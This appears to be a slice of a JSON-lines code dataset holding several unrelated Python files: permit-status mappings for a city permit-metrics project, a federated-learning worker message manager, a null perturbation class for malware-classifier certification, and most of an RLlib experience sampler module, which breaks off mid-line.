{\n 'Application Submittal - Route':'Start',\n 'Consolidated Comments - With Customer for Response':'Round_End',\n 'Resubmittal or Revision - Route':'Round_Start',\n #'Building Review - Notes':'Pause',\n 'Ready to Issue - Conditionally Approved':'End',\n 'Ready to Issue - Issued':'End',\n 'Ready to Issue - Approved':'End'\n}\n\nSDP = {\n 'Status - Received':'Start',\n 'Application Submittal - Route':'Start',\n 'Consolidated Comments - With Customer for Response':'Round_End',\n 'Consolidated Comments - Resubmittal':'Round_Start',\n #'Consolidated Comments - Ready to Issue': 'Round_Start',\n #'Status - Approved':'End'\n 'Ready to Issue - Issue':'End'\n #'Application Submittal - Ready to Issue':'End'\n}\n\nPLAN_30 = {\n 'Status - Received':'Start',\n 'Intake Review - Application Accepted':'Start',\n 'Consolidated Comments - Deemed Incomplete':'Round_End',\n 'Resubmittal - Route for Review':'Round_Start',\n 'Consolidated Comments - Deemed Complete':'End',\n 'Staff Analysis - Set for Hearing':'End',\n 'Staff Analysis - Staff Level Decision':'End'\n}\n\n# decision types\npath = r'data\\clean_data\\entitlement_info.xlsx'\n# open xlsx file as df and make first row the column names\nent_df = pd.read_excel(path, header=1) \\\n [['Permit Type', 'Entitlement?', 'Public Hearing?']]\n\npub_hearing_permit_types = \\\n ent_df[ent_df['Public Hearing?']=='YES']['Permit Type'].unique()\n\nstaff_decision_permit_types = \\\n ent_df[ent_df['Public Hearing?']=='NO']['Permit Type'].unique()\n\n# other decision indicators\nstaff_dec_ts = [\n 'Staff Level Decision - Approved'\n]\npublic_dec_ts = [\n 'Staff Level Decision - Appealed'\n ]\n\npublic_dec_t = [\n 'Design Review Commission', 'Planning Commission', \n 'Zoning Administrator', 'City Council'\n]\nboard_dec_t = [\n t for t in public_dec_t if t != 'Zoning Administrator'\n]\n\n\n# BAD PERMITS?\nbad = [\n 'Y18-031', # resub after PC decision\n 'Y18-036', # inconsistent starts\n 'Y18-072',\n 'Y18-013', # CEQA caused odd resubmittal\n 'Y18-039', # CEQA problem\n 'Y18-058', # resub after PC decision\n 'Y18-066', # missing resubmittal\n 'Y18-088', # missing resubmittal\n 'Y19-010', # resub after PC decision\n 'Y19-020', # appealed then resub\n 'Y19-041', # weird ordering of resubmittal\n 'Y19-057', # resub after staff & PC decision\n 'Y19-110', # resub after PC decision\n 'Y19-122', # resub after PC decision\n 'Y19-123', # resub after PC 
decision\n 'Y19-140', # withdrawn\n 'Y21-011', # missing resubmittal, \n 'Y21-053', # weird multi deemed incomplete with DRC in the front\n 'Y21-065', # missing resubmittal\n 'Y21-099', # missing resubmittal\n 'Y21-111',\n 'Y21-114', # missing resubmittal\n 'Y21-033', # missing resubmittal\n ''\n]\nsorta_bad = [\n 'Y19-123',\n 'Y20-052',\n 'Y21-011', # round end, review, round end\n 'Y20-040', # design review continued?\n 'Y19-122', # review after comm\n \n ''\n]","repo_name":"nelmsal/WC_Accela_Permit_Metrics","sub_path":"python/functions/permits.py","file_name":"permits.py","file_ext":"py","file_size_in_byte":5033,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"70982724269","text":"\nfrom fedrec.communications.messages import ProcMessage\nimport logging\n\nfrom fedrec.communications.comm_manager import (CommunicationManager,\n tag_reciever)\n\n\nclass WorkerComManager(CommunicationManager):\n def __init__(self, trainer, worker_id, config_dict):\n super().__init__(config_dict=config_dict)\n self.trainer = trainer\n self.round_idx = 0\n self.id = worker_id\n\n def run(self):\n super().run()\n\n async def send_message_get_models(self, receive_id, global_model_params, client_index):\n logging.info(\n \"send_message_sync_model_to_client. receive_id = %d\" % receive_id)\n message = Message(\n MyMessage.MSG_TYPE_S2C_SYNC_MODEL_TO_CLIENT, self.get_sender_id(), receive_id)\n message.add_params(\n MyMessage.MSG_ARG_KEY_MODEL_PARAMS, global_model_params)\n message.add_params(\n MyMessage.MSG_ARG_KEY_CLIENT_INDEX, str(client_index))\n return self.send_message(message, block=True)\n\n def send_model(self, receive_id, weights, local_sample_num):\n message = Message(\n MyMessage.MSG_TYPE_C2S_SEND_MODEL_TO_SERVER, self.get_sender_id(), receive_id)\n message.add_params(MyMessage.MSG_ARG_KEY_MODEL_PARAMS, weights)\n message.add_params(MyMessage.MSG_ARG_KEY_NUM_SAMPLES, local_sample_num)\n self.send_message(message)\n","repo_name":"vkkhare/RecoEdge","sub_path":"fedrec/communications/worker_manager.py","file_name":"worker_manager.py","file_ext":"py","file_size_in_byte":1416,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"37"} +{"seq_id":"21048438595","text":"from typing import Sequence\n\nfrom ..types import IntBinarySample, IntBinary\nfrom .perturbation import RandomPerturbation\n\n\nclass NullPerturbation(RandomPerturbation[IntBinarySample, IntBinary]):\n \"\"\"A perturbation that returns the input unchanged\"\"\"\n\n def __call__(self, input: IntBinarySample) -> IntBinary:\n super().__call__(input)\n binaries, metadata = input\n return binaries\n\n def certified_radius(\n self,\n input: IntBinarySample,\n pred: int,\n counts: Sequence[int],\n alpha: float = 0.05,\n **kwargs,\n ) -> float:\n return 0\n","repo_name":"Dovermore/randomized-deletion","sub_path":"src/torchmalware/certification/null_perturbation.py","file_name":"null_perturbation.py","file_ext":"py","file_size_in_byte":609,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"37"} +{"seq_id":"35764812430","text":"from abc import abstractmethod, ABCMeta\nfrom collections import defaultdict, namedtuple\nimport logging\nimport numpy as np\nimport queue\nimport threading\nimport time\n\nfrom ray.util.debug import log_once\nfrom ray.rllib.evaluation.episode import MultiAgentEpisode\nfrom ray.rllib.evaluation.rollout_metrics import RolloutMetrics\nfrom ray.rllib.evaluation.sample_batch_builder import \\\n 
MultiAgentSampleBatchBuilder\nfrom ray.rllib.policy.policy import clip_action\nfrom ray.rllib.policy.tf_policy import TFPolicy\nfrom ray.rllib.env.base_env import BaseEnv, ASYNC_RESET_RETURN\nfrom ray.rllib.env.atari_wrappers import get_wrapper_by_cls, MonitorEnv\nfrom ray.rllib.offline import InputReader\nfrom ray.rllib.utils import try_import_tree\nfrom ray.rllib.utils.annotations import override, DeveloperAPI\nfrom ray.rllib.utils.debug import summarize\nfrom ray.rllib.utils.spaces.space_utils import flatten_to_single_ndarray, \\\n unbatch\nfrom ray.rllib.utils.tf_run_builder import TFRunBuilder\n\ntree = try_import_tree()\n\nlogger = logging.getLogger(__name__)\n\nPolicyEvalData = namedtuple(\"PolicyEvalData\", [\n \"env_id\", \"agent_id\", \"obs\", \"info\", \"rnn_state\", \"prev_action\",\n \"prev_reward\"\n])\n\n\nclass PerfStats:\n \"\"\"Sampler perf stats that will be included in rollout metrics.\"\"\"\n\n def __init__(self):\n self.iters = 0\n self.env_wait_time = 0.0\n self.processing_time = 0.0\n self.inference_time = 0.0\n\n def get(self):\n return {\n \"mean_env_wait_ms\": self.env_wait_time * 1000 / self.iters,\n \"mean_processing_ms\": self.processing_time * 1000 / self.iters,\n \"mean_inference_ms\": self.inference_time * 1000 / self.iters\n }\n\n\n@DeveloperAPI\nclass SamplerInput(InputReader, metaclass=ABCMeta):\n \"\"\"Reads input experiences from an existing sampler.\"\"\"\n\n @override(InputReader)\n def next(self):\n batches = [self.get_data()]\n batches.extend(self.get_extra_batches())\n if len(batches) > 1:\n return batches[0].concat_samples(batches)\n else:\n return batches[0]\n\n @abstractmethod\n @DeveloperAPI\n def get_data(self):\n raise NotImplementedError\n\n @abstractmethod\n @DeveloperAPI\n def get_metrics(self):\n raise NotImplementedError\n\n @abstractmethod\n @DeveloperAPI\n def get_extra_batches(self):\n raise NotImplementedError\n\n\n@DeveloperAPI\nclass SyncSampler(SamplerInput):\n \"\"\"Sync SamplerInput that collects experiences when `get_data()` is called.\n \"\"\"\n\n def __init__(self,\n *,\n worker,\n env,\n policies,\n policy_mapping_fn,\n preprocessors,\n obs_filters,\n clip_rewards,\n rollout_fragment_length,\n callbacks,\n horizon=None,\n pack_multiple_episodes_in_batch=False,\n tf_sess=None,\n clip_actions=True,\n soft_horizon=False,\n no_done_at_end=False,\n observation_fn=None):\n \"\"\"Initializes a SyncSampler object.\n\n Args:\n worker (RolloutWorker): The RolloutWorker that will use this\n Sampler for sampling.\n env (Env): Any Env object. Will be converted into an RLlib BaseEnv.\n policies (Dict[str,Policy]): Mapping from policy ID to Policy obj.\n policy_mapping_fn (callable): Callable that takes an agent ID and\n returns a Policy object.\n preprocessors (Dict[str,Preprocessor]): Mapping from policy ID to\n Preprocessor object for the observations prior to filtering.\n obs_filters (Dict[str,Filter]): Mapping from policy ID to\n env Filter object.\n clip_rewards (Union[bool,float]): True for +/-1.0 clipping, actual\n float value for +/- value clipping. False for no clipping.\n rollout_fragment_length (int): The length of a fragment to collect\n before building a SampleBatch from the data and resetting\n the SampleBatchBuilder object.\n callbacks (Callbacks): The Callbacks object to use when episode\n events happen during rollout.\n horizon (Optional[int]): Hard-reset the Env\n pack_multiple_episodes_in_batch (bool): Whether to pack multiple\n episodes into each batch. 
This guarantees batches will be\n exactly `rollout_fragment_length` in size.\n tf_sess (Optional[tf.Session]): A tf.Session object to use (only if\n framework=tf).\n clip_actions (bool): Whether to clip actions according to the\n given action_space's bounds.\n soft_horizon (bool): If True, calculate bootstrapped values as if\n episode had ended, but don't physically reset the environment\n when the horizon is hit.\n no_done_at_end (bool): Ignore the done=True at the end of the\n episode and instead record done=False.\n observation_fn (Optional[ObservationFunction]): Optional\n multi-agent observation func to use for preprocessing\n observations.\n \"\"\"\n\n self.base_env = BaseEnv.to_base_env(env)\n self.rollout_fragment_length = rollout_fragment_length\n self.horizon = horizon\n self.policies = policies\n self.policy_mapping_fn = policy_mapping_fn\n self.preprocessors = preprocessors\n self.obs_filters = obs_filters\n self.extra_batches = queue.Queue()\n self.perf_stats = PerfStats()\n # Create the rollout generator to use for calls to `get_data()`.\n self.rollout_provider = _env_runner(\n worker, self.base_env, self.extra_batches.put, self.policies,\n self.policy_mapping_fn, self.rollout_fragment_length, self.horizon,\n self.preprocessors, self.obs_filters, clip_rewards, clip_actions,\n pack_multiple_episodes_in_batch, callbacks, tf_sess,\n self.perf_stats, soft_horizon, no_done_at_end, observation_fn)\n self.metrics_queue = queue.Queue()\n\n @override(SamplerInput)\n def get_data(self):\n while True:\n item = next(self.rollout_provider)\n if isinstance(item, RolloutMetrics):\n self.metrics_queue.put(item)\n else:\n return item\n\n @override(SamplerInput)\n def get_metrics(self):\n completed = []\n while True:\n try:\n completed.append(self.metrics_queue.get_nowait()._replace(\n perf_stats=self.perf_stats.get()))\n except queue.Empty:\n break\n return completed\n\n @override(SamplerInput)\n def get_extra_batches(self):\n extra = []\n while True:\n try:\n extra.append(self.extra_batches.get_nowait())\n except queue.Empty:\n break\n return extra\n\n\n@DeveloperAPI\nclass AsyncSampler(threading.Thread, SamplerInput):\n \"\"\"Async SamplerInput that collects experiences in thread and queues them.\n\n Once started, experiences are continuously collected and put into a Queue,\n from where they can be unqueued by the caller of `get_data()`.\n \"\"\"\n\n def __init__(self,\n *,\n worker,\n env,\n policies,\n policy_mapping_fn,\n preprocessors,\n obs_filters,\n clip_rewards,\n rollout_fragment_length,\n callbacks,\n horizon=None,\n pack_multiple_episodes_in_batch=False,\n tf_sess=None,\n clip_actions=True,\n blackhole_outputs=False,\n soft_horizon=False,\n no_done_at_end=False,\n observation_fn=None):\n \"\"\"Initializes an AsyncSampler object.\n\n Args:\n worker (RolloutWorker): The RolloutWorker that will use this\n Sampler for sampling.\n env (Env): Any Env object. Will be converted into an RLlib BaseEnv.\n policies (Dict[str,Policy]): Mapping from policy ID to Policy obj.\n policy_mapping_fn (callable): Callable that takes an agent ID and\n returns a Policy object.\n preprocessors (Dict[str,Preprocessor]): Mapping from policy ID to\n Preprocessor object for the observations prior to filtering.\n obs_filters (Dict[str,Filter]): Mapping from policy ID to\n env Filter object.\n clip_rewards (Union[bool,float]): True for +/-1.0 clipping, actual\n float value for +/- value clipping. 
False for no clipping.\n rollout_fragment_length (int): The length of a fragment to collect\n before building a SampleBatch from the data and resetting\n the SampleBatchBuilder object.\n callbacks (Callbacks): The Callbacks object to use when episode\n events happen during rollout.\n horizon (Optional[int]): Hard-reset the Env\n pack_multiple_episodes_in_batch (bool): Whether to pack multiple\n episodes into each batch. This guarantees batches will be\n exactly `rollout_fragment_length` in size.\n tf_sess (Optional[tf.Session]): A tf.Session object to use (only if\n framework=tf).\n clip_actions (bool): Whether to clip actions according to the\n given action_space's bounds.\n blackhole_outputs (bool): Whether to collect samples, but then\n not further process or store them (throw away all samples).\n soft_horizon (bool): If True, calculate bootstrapped values as if\n episode had ended, but don't physically reset the environment\n when the horizon is hit.\n no_done_at_end (bool): Ignore the done=True at the end of the\n episode and instead record done=False.\n observation_fn (Optional[ObservationFunction]): Optional\n multi-agent observation func to use for preprocessing\n observations.\n \"\"\"\n for _, f in obs_filters.items():\n assert getattr(f, \"is_concurrent\", False), \\\n \"Observation Filter must support concurrent updates.\"\n self.worker = worker\n self.base_env = BaseEnv.to_base_env(env)\n threading.Thread.__init__(self)\n self.queue = queue.Queue(5)\n self.extra_batches = queue.Queue()\n self.metrics_queue = queue.Queue()\n self.rollout_fragment_length = rollout_fragment_length\n self.horizon = horizon\n self.policies = policies\n self.policy_mapping_fn = policy_mapping_fn\n self.preprocessors = preprocessors\n self.obs_filters = obs_filters\n self.clip_rewards = clip_rewards\n self.daemon = True\n self.pack_multiple_episodes_in_batch = pack_multiple_episodes_in_batch\n self.tf_sess = tf_sess\n self.callbacks = callbacks\n self.clip_actions = clip_actions\n self.blackhole_outputs = blackhole_outputs\n self.soft_horizon = soft_horizon\n self.no_done_at_end = no_done_at_end\n self.perf_stats = PerfStats()\n self.shutdown = False\n self.observation_fn = observation_fn\n\n @override(threading.Thread)\n def run(self):\n try:\n self._run()\n except BaseException as e:\n self.queue.put(e)\n raise e\n\n def _run(self):\n if self.blackhole_outputs:\n queue_putter = (lambda x: None)\n extra_batches_putter = (lambda x: None)\n else:\n queue_putter = self.queue.put\n extra_batches_putter = (\n lambda x: self.extra_batches.put(x, timeout=600.0))\n rollout_provider = _env_runner(\n self.worker, self.base_env, extra_batches_putter, self.policies,\n self.policy_mapping_fn, self.rollout_fragment_length, self.horizon,\n self.preprocessors, self.obs_filters, self.clip_rewards,\n self.clip_actions, self.pack_multiple_episodes_in_batch,\n self.callbacks, self.tf_sess, self.perf_stats, self.soft_horizon,\n self.no_done_at_end, self.observation_fn)\n while not self.shutdown:\n # The timeout variable exists because apparently, if one worker\n # dies, the other workers won't die with it, unless the timeout is\n # set to some large number. 
This is an empirical observation.\n item = next(rollout_provider)\n if isinstance(item, RolloutMetrics):\n self.metrics_queue.put(item)\n else:\n queue_putter(item)\n\n @override(SamplerInput)\n def get_data(self):\n if not self.is_alive():\n raise RuntimeError(\"Sampling thread has died\")\n rollout = self.queue.get(timeout=600.0)\n\n # Propagate errors\n if isinstance(rollout, BaseException):\n raise rollout\n\n return rollout\n\n @override(SamplerInput)\n def get_metrics(self):\n completed = []\n while True:\n try:\n completed.append(self.metrics_queue.get_nowait()._replace(\n perf_stats=self.perf_stats.get()))\n except queue.Empty:\n break\n return completed\n\n @override(SamplerInput)\n def get_extra_batches(self):\n extra = []\n while True:\n try:\n extra.append(self.extra_batches.get_nowait())\n except queue.Empty:\n break\n return extra\n\n\ndef _env_runner(worker, base_env, extra_batch_callback, policies,\n policy_mapping_fn, rollout_fragment_length, horizon,\n preprocessors, obs_filters, clip_rewards, clip_actions,\n pack_multiple_episodes_in_batch, callbacks, tf_sess,\n perf_stats, soft_horizon, no_done_at_end, observation_fn):\n \"\"\"This implements the common experience collection logic.\n\n Args:\n worker (RolloutWorker): Reference to the current rollout worker.\n base_env (BaseEnv): Env implementing BaseEnv.\n extra_batch_callback (fn): function to send extra batch data to.\n policies (dict): Map of policy ids to Policy instances.\n policy_mapping_fn (func): Function that maps agent ids to policy ids.\n This is called when an agent first enters the environment. The\n agent is then \"bound\" to the returned policy for the episode.\n rollout_fragment_length (int): Number of episode steps before\n `SampleBatch` is yielded. Set to infinity to yield complete\n episodes.\n horizon (int): Horizon of the episode.\n preprocessors (dict): Map of policy id to preprocessor for the\n observations prior to filtering.\n obs_filters (dict): Map of policy id to filter used to process\n observations for the policy.\n clip_rewards (bool): Whether to clip rewards before postprocessing.\n pack_multiple_episodes_in_batch (bool): Whether to pack multiple\n episodes into each batch. This guarantees batches will be exactly\n `rollout_fragment_length` in size.\n clip_actions (bool): Whether to clip actions to the space range.\n callbacks (DefaultCallbacks): User callbacks to run on episode events.\n tf_sess (Session|None): Optional tensorflow session to use for batching\n TF policy evaluations.\n perf_stats (PerfStats): Record perf stats into this object.\n soft_horizon (bool): Calculate rewards but don't reset the\n environment when the horizon is hit.\n no_done_at_end (bool): Ignore the done=True at the end of the episode\n and instead record done=False.\n observation_fn (ObservationFunction): Optional multi-agent\n observation func to use for preprocessing observations.\n\n Yields:\n rollout (SampleBatch): Object containing state, action, reward,\n terminal condition, and other fields as dictated by `policy`.\n \"\"\"\n\n # Try to get Env's max_episode_steps prop. 
If it doesn't exist, catch\n # error and continue.\n max_episode_steps = None\n try:\n max_episode_steps = base_env.get_unwrapped()[0].spec.max_episode_steps\n except Exception:\n pass\n\n # Trainer has a given `horizon` setting.\n if horizon:\n # `horizon` is larger than env's limit -> Error and explain how\n # to increase Env's own episode limit.\n if max_episode_steps and horizon > max_episode_steps:\n raise ValueError(\n \"Your `horizon` setting ({}) is larger than the Env's own \"\n \"timestep limit ({})! Try to increase the Env's limit via \"\n \"setting its `spec.max_episode_steps` property.\".format(\n horizon, max_episode_steps))\n # Otherwise, set Trainer's horizon to env's max-steps.\n elif max_episode_steps:\n horizon = max_episode_steps\n logger.debug(\n \"No episode horizon specified, setting it to Env's limit ({}).\".\n format(max_episode_steps))\n else:\n horizon = float(\"inf\")\n logger.debug(\"No episode horizon specified, assuming inf.\")\n\n # Pool of batch builders, which can be shared across episodes to pack\n # trajectory data.\n batch_builder_pool = []\n\n def get_batch_builder():\n if batch_builder_pool:\n return batch_builder_pool.pop()\n else:\n return MultiAgentSampleBatchBuilder(policies, clip_rewards,\n callbacks)\n\n def new_episode():\n episode = MultiAgentEpisode(policies, policy_mapping_fn,\n get_batch_builder, extra_batch_callback)\n # Call each policy's Exploration.on_episode_start method.\n for p in policies.values():\n if getattr(p, \"exploration\", None) is not None:\n p.exploration.on_episode_start(\n policy=p,\n environment=base_env,\n episode=episode,\n tf_sess=getattr(p, \"_sess\", None))\n callbacks.on_episode_start(\n worker=worker,\n base_env=base_env,\n policies=policies,\n episode=episode)\n return episode\n\n active_episodes = defaultdict(new_episode)\n\n while True:\n perf_stats.iters += 1\n t0 = time.time()\n # Get observations from all ready agents.\n unfiltered_obs, rewards, dones, infos, off_policy_actions = \\\n base_env.poll()\n perf_stats.env_wait_time += time.time() - t0\n\n if log_once(\"env_returns\"):\n logger.info(\"Raw obs from env: {}\".format(\n summarize(unfiltered_obs)))\n logger.info(\"Info return from env: {}\".format(summarize(infos)))\n\n # Process observations and prepare for policy evaluation.\n t1 = time.time()\n active_envs, to_eval, outputs = _process_observations(\n worker=worker,\n base_env=base_env,\n policies=policies,\n batch_builder_pool=batch_builder_pool,\n active_episodes=active_episodes,\n unfiltered_obs=unfiltered_obs,\n rewards=rewards,\n dones=dones,\n infos=infos,\n horizon=horizon,\n preprocessors=preprocessors,\n obs_filters=obs_filters,\n rollout_fragment_length=rollout_fragment_length,\n pack_multiple_episodes_in_batch=pack_multiple_episodes_in_batch,\n callbacks=callbacks,\n soft_horizon=soft_horizon,\n no_done_at_end=no_done_at_end,\n observation_fn=observation_fn)\n perf_stats.processing_time += time.time() - t1\n for o in outputs:\n yield o\n\n # Do batched policy eval (across vectorized envs).\n t2 = time.time()\n eval_results = _do_policy_eval(\n to_eval=to_eval,\n policies=policies,\n active_episodes=active_episodes,\n tf_sess=tf_sess)\n perf_stats.inference_time += time.time() - t2\n\n # Process results and update episode state.\n t3 = time.time()\n actions_to_send = _process_policy_eval_results(\n to_eval=to_eval,\n eval_results=eval_results,\n active_episodes=active_episodes,\n active_envs=active_envs,\n off_policy_actions=off_policy_actions,\n policies=policies,\n 
clip_actions=clip_actions)\n perf_stats.processing_time += time.time() - t3\n\n # Return computed actions to ready envs. We also send to envs that have\n # taken off-policy actions; those envs are free to ignore the action.\n t4 = time.time()\n base_env.send_actions(actions_to_send)\n perf_stats.env_wait_time += time.time() - t4\n\n\ndef _process_observations(\n worker, base_env, policies, batch_builder_pool, active_episodes,\n unfiltered_obs, rewards, dones, infos, horizon, preprocessors,\n obs_filters, rollout_fragment_length, pack_multiple_episodes_in_batch,\n callbacks, soft_horizon, no_done_at_end, observation_fn):\n \"\"\"Record new data from the environment and prepare for policy evaluation.\n\n Args:\n worker (RolloutWorker): Reference to the current rollout worker.\n base_env (BaseEnv): Env implementing BaseEnv.\n policies (dict): Map of policy ids to Policy instances.\n batch_builder_pool (List[SampleBatchBuilder]): List of pooled\n SampleBatchBuilder object for recycling.\n active_episodes (defaultdict[str,MultiAgentEpisode]): Mapping from\n episode ID to currently ongoing MultiAgentEpisode object.\n unfiltered_obs (dict): Doubly keyed dict of env-ids -> agent ids ->\n unfiltered observation tensor, returned by a `BaseEnv.poll()` call.\n rewards (dict): Doubly keyed dict of env-ids -> agent ids ->\n rewards tensor, returned by a `BaseEnv.poll()` call.\n dones (dict): Doubly keyed dict of env-ids -> agent ids ->\n boolean done flags, returned by a `BaseEnv.poll()` call.\n infos (dict): Doubly keyed dict of env-ids -> agent ids ->\n info dicts, returned by a `BaseEnv.poll()` call.\n horizon (int): Horizon of the episode.\n preprocessors (dict): Map of policy id to preprocessor for the\n observations prior to filtering.\n obs_filters (dict): Map of policy id to filter used to process\n observations for the policy.\n rollout_fragment_length (int): Number of episode steps before\n `SampleBatch` is yielded. Set to infinity to yield complete\n episodes.\n pack_multiple_episodes_in_batch (bool): Whether to pack multiple\n episodes into each batch. This guarantees batches will be exactly\n `rollout_fragment_length` in size.\n callbacks (DefaultCallbacks): User callbacks to run on episode events.\n soft_horizon (bool): Calculate rewards but don't reset the\n environment when the horizon is hit.\n no_done_at_end (bool): Ignore the done=True at the end of the episode\n and instead record done=False.\n observation_fn (ObservationFunction): Optional multi-agent\n observation func to use for preprocessing observations.\n\n Returns:\n Tuple:\n - active_envs: Set of non-terminated env ids.\n - to_eval: Map of policy_id to list of agent PolicyEvalData.\n - outputs: List of metrics and samples to return from the sampler.\n \"\"\"\n\n active_envs = set()\n to_eval = defaultdict(list)\n outputs = []\n large_batch_threshold = max(1000, rollout_fragment_length * 10) if \\\n rollout_fragment_length != float(\"inf\") else 5000\n\n # For each environment.\n for env_id, agent_obs in unfiltered_obs.items():\n is_new_episode = env_id not in active_episodes\n episode = active_episodes[env_id]\n if not is_new_episode:\n episode.length += 1\n episode.batch_builder.count += 1\n episode._add_agent_rewards(rewards[env_id])\n\n if (episode.batch_builder.total() > large_batch_threshold\n and log_once(\"large_batch_warning\")):\n logger.warning(\n \"More than {} observations for {} env steps \".format(\n episode.batch_builder.total(),\n episode.batch_builder.count) + \"are buffered in \"\n \"the sampler. 
If this is more than you expected, check \"\n \"that you set a horizon on your environment correctly and that\"\n \" it terminates at some point. \"\n \"Note: In multi-agent environments, `rollout_fragment_length` \"\n \"sets the batch size based on environment steps, not the \"\n \"steps of \"\n \"individual agents, which can result in unexpectedly large \"\n \"batches. Also, you may be in evaluation waiting for your Env \"\n \"to terminate (batch_mode=`complete_episodes`). Make sure it \"\n \"does at some point.\")\n\n # Check episode termination conditions.\n if dones[env_id][\"__all__\"] or episode.length >= horizon:\n hit_horizon = (episode.length >= horizon\n and not dones[env_id][\"__all__\"])\n all_agents_done = True\n atari_metrics = _fetch_atari_metrics(base_env)\n if atari_metrics is not None:\n for m in atari_metrics:\n outputs.append(\n m._replace(custom_metrics=episode.custom_metrics))\n else:\n outputs.append(\n RolloutMetrics(episode.length, episode.total_reward,\n dict(episode.agent_rewards),\n episode.custom_metrics, {},\n episode.hist_data))\n else:\n hit_horizon = False\n all_agents_done = False\n active_envs.add(env_id)\n\n # Custom observation function is applied before preprocessing.\n if observation_fn:\n agent_obs = observation_fn(\n agent_obs=agent_obs,\n worker=worker,\n base_env=base_env,\n policies=policies,\n episode=episode)\n if not isinstance(agent_obs, dict):\n raise ValueError(\n \"observe() must return a dict of agent observations\")\n\n # For each agent in the environment.\n for agent_id, raw_obs in agent_obs.items():\n assert agent_id != \"__all__\"\n policy_id = episode.policy_for(agent_id)\n prep_obs = _get_or_raise(preprocessors,\n policy_id).transform(raw_obs)\n if log_once(\"prep_obs\"):\n logger.info(\"Preprocessed obs: {}\".format(summarize(prep_obs)))\n\n filtered_obs = _get_or_raise(obs_filters, policy_id)(prep_obs)\n if log_once(\"filtered_obs\"):\n logger.info(\"Filtered obs: {}\".format(summarize(filtered_obs)))\n\n agent_done = bool(all_agents_done or dones[env_id].get(agent_id))\n if not agent_done:\n to_eval[policy_id].append(\n PolicyEvalData(env_id, agent_id, filtered_obs,\n infos[env_id].get(agent_id, {}),\n episode.rnn_state_for(agent_id),\n episode.last_action_for(agent_id),\n rewards[env_id][agent_id] or 0.0))\n\n last_observation = episode.last_observation_for(agent_id)\n episode._set_last_observation(agent_id, filtered_obs)\n episode._set_last_raw_obs(agent_id, raw_obs)\n episode._set_last_info(agent_id, infos[env_id].get(agent_id, {}))\n\n # Record transition info if applicable.\n if (last_observation is not None and infos[env_id].get(\n agent_id, {}).get(\"training_enabled\", True)):\n episode.batch_builder.add_values(\n agent_id,\n policy_id,\n t=episode.length - 1,\n eps_id=episode.episode_id,\n agent_index=episode._agent_index(agent_id),\n obs=last_observation,\n actions=episode.last_action_for(agent_id),\n rewards=rewards[env_id][agent_id],\n prev_actions=episode.prev_action_for(agent_id),\n prev_rewards=episode.prev_reward_for(agent_id),\n dones=(False if (no_done_at_end\n or (hit_horizon and soft_horizon)) else\n agent_done),\n infos=infos[env_id].get(agent_id, {}),\n new_obs=filtered_obs,\n **episode.last_pi_info_for(agent_id))\n\n # Invoke the step callback after the step is logged to the episode\n callbacks.on_episode_step(\n worker=worker, base_env=base_env, episode=episode)\n\n # Cut the batch if we're not packing multiple episodes into one,\n # or if we've exceeded the requested batch size.\n if 
episode.batch_builder.has_pending_agent_data():\n # Sanity check, whether all agents have done=True, if done[__all__]\n # is True.\n if dones[env_id][\"__all__\"] and not no_done_at_end:\n episode.batch_builder.check_missing_dones()\n\n # Reached end of episode and we are not allowed to pack the\n # next episode into the same SampleBatch -> Build the SampleBatch\n # and add it to \"outputs\".\n if (all_agents_done and not pack_multiple_episodes_in_batch) or \\\n episode.batch_builder.count >= rollout_fragment_length:\n outputs.append(episode.batch_builder.build_and_reset(episode))\n # Make sure postprocessor stays within one episode.\n elif all_agents_done:\n episode.batch_builder.postprocess_batch_so_far(episode)\n\n if all_agents_done:\n # Handle episode termination.\n batch_builder_pool.append(episode.batch_builder)\n # Call each policy's Exploration.on_episode_end method.\n for p in policies.values():\n if getattr(p, \"exploration\", None) is not None:\n p.exploration.on_episode_end(\n policy=p,\n environment=base_env,\n episode=episode,\n tf_sess=getattr(p, \"_sess\", None))\n # Call custom on_episode_end callback.\n callbacks.on_episode_end(\n worker=worker,\n base_env=base_env,\n policies=policies,\n episode=episode)\n if hit_horizon and soft_horizon:\n episode.soft_reset()\n resetted_obs = agent_obs\n else:\n del active_episodes[env_id]\n resetted_obs = base_env.try_reset(env_id)\n if resetted_obs is None:\n # Reset not supported, drop this env from the ready list.\n if horizon != float(\"inf\"):\n raise ValueError(\n \"Setting episode horizon requires reset() support \"\n \"from the environment.\")\n elif resetted_obs != ASYNC_RESET_RETURN:\n # Creates a new episode if this is not async return.\n # If reset is async, we will get its result in some future poll\n episode = active_episodes[env_id]\n if observation_fn:\n resetted_obs = observation_fn(\n agent_obs=resetted_obs,\n worker=worker,\n base_env=base_env,\n policies=policies,\n episode=episode)\n for agent_id, raw_obs in resetted_obs.items():\n policy_id = episode.policy_for(agent_id)\n policy = _get_or_raise(policies, policy_id)\n prep_obs = _get_or_raise(preprocessors,\n policy_id).transform(raw_obs)\n filtered_obs = _get_or_raise(obs_filters,\n policy_id)(prep_obs)\n episode._set_last_observation(agent_id, filtered_obs)\n to_eval[policy_id].append(\n PolicyEvalData(\n env_id, agent_id, filtered_obs,\n episode.last_info_for(agent_id) or {},\n episode.rnn_state_for(agent_id),\n np.zeros_like(\n flatten_to_single_ndarray(\n policy.action_space.sample())), 0.0))\n\n return active_envs, to_eval, outputs\n\n\ndef _do_policy_eval(*, to_eval, policies, active_episodes, tf_sess=None):\n \"\"\"Call compute_actions on collected episode/model data to get next action.\n\n Args:\n tf_sess (Optional[tf.Session]): Optional tensorflow session to use for\n batching TF policy evaluations.\n to_eval (Dict[str,List[PolicyEvalData]]): Mapping of policy IDs to\n lists of PolicyEvalData objects.\n policies (Dict[str,Policy]): Mapping from policy ID to Policy obj.\n active_episodes (defaultdict[str,MultiAgentEpisode]): Mapping from\n episode ID to currently ongoing MultiAgentEpisode object.\n\n Returns:\n eval_results: dict of policy to compute_action() outputs.\n \"\"\"\n\n eval_results = {}\n\n if tf_sess:\n builder = TFRunBuilder(tf_sess, \"policy_eval\")\n pending_fetches = {}\n else:\n builder = None\n\n if log_once(\"compute_actions_input\"):\n logger.info(\"Inputs to compute_actions():\\n\\n{}\\n\".format(\n summarize(to_eval)))\n\n for 
